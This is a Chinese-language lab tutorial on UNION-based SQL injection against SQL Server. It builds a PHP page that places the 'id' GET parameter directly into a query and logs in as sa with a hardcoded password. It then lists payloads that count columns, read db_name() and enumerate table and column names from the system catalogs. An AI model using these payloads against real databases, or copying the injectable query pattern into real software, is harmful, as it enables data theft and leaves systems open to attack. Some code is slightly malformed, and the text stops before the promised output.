SQL注入篇——SqlServer的联合查询注入_sql注入 db_name()

sqlserver 常用系统函数：

1. suser_name() 用户登录名
2. user_name() 用户在数据库中的名字
3. user 用户在数据库中的名字
4. show_role() 对当前用户起作用的规则
5. db_name() 数据库名
6. object_name(obj_id) 数据库对象名
7. col_name(obj_id,col_id) 列名
8. col_length(objname,colname) 列长度
9. valid_name(char_expr) 是否是有效标识符

实验环境：

• SqlServer
• PHPstudy

在www目录下添加一个php文件，源码如下：

<?php
header("Content-Type:text/html;charset=gbk");
$conn = sqlsrv_connect('localhost', array('Database' => 'text', 'UID' => 'sa' , 'PWD' => '123.com'));
if($conn == false){
	var_dump(sqlsrv_errors());exit;
}
$id = $_GET["id"];
$sql = "SELECT * FROM users where id = $id";
echo $sql;
echo "<hr>";
$result = sqlsrv_query($conn, $sql);
var_dump(sqlsrv_errors());
echo "<hr>";
if ( $re = sqlsrv_fetch_array($result)) {
	echo $re['id'];
	echo "<hr>";
	echo $re['username'];
	echo "<hr>";
	echo $re['password'];
	echo "<hr>";
}
echo "finish";
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

一、判断显示位

id=1 order by 3
1

当输入4时报错，说明显示位有三个

二、获取当前的数据库

使用函数db_name()

id=-1 union select null,db_name(),null
1

三、获取当前数据库的表

将获取到的数据库名与.sys.sysobjects拼接

id=-1 union select top 1 null,name ,null FROM text.sys.sysobjects where xtype = 'U'
1

top 1代表只显示第一列数据
如果想显示更多数据在后面加and name != '第一次输出中的表名'以此类推，如：

id=-1 union select top 1 null,name ,null FROM text.sys.sysobjects where xtype = 'U' and name != 'users' and name != '第二次输出中的表名'
1

xtype = 'U'代表指定显示用户创建的表

四、获取当前数据库的表下的字段

id=1 Select name from 你的数据库.sys.syscolumns Where ID =OBJECT_ID('第一次输出中的表名' and name != '第二次输出中的表名')
or
id=1 Select name from 你的数据库.sys.syscolumns Where ID =OBJECT_ID('数据库.dbo.表名')
1
2
3

效果如下：